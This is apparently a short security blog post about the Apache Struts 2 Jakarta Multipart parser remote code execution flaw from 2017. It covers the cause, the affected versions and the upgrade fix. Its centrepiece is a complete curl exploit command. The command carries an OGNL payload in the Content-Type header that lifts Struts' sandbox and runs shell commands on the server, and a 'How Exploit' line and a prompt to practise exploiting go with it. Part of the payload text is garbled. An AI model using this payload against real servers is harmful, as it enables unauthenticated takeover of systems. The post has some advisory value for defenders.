Listen to this Post
How the mentioned CVE works:
The vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The flaw is triggered when a malicious `Content-Type` header is sent with a file upload request. The parser incorrectly processes the header value, attempting to evaluate it as an Object-Graph Navigation Language (OGNL) expression. This occurs due to improper exception handling during file upload. An attacker can craft a `Content-Type` header containing a malicious OGNL expression. Because the application server executes this expression on the server side, it leads to arbitrary code execution with the privileges of the Struts application. This attack vector does not require the attacker to have any authentication, making it highly exploitable.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: March 7, 2017
Prediction: Patch Available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/upload.action`
How Exploit:
Craft malicious HTTP request with OGNL payload in Content-Type header targeting file upload endpoints.
Protection from this CVE:
Upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules to block malicious OGNL patterns in headers.
Impact:
Full system compromise, unauthorized data access, complete server control.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

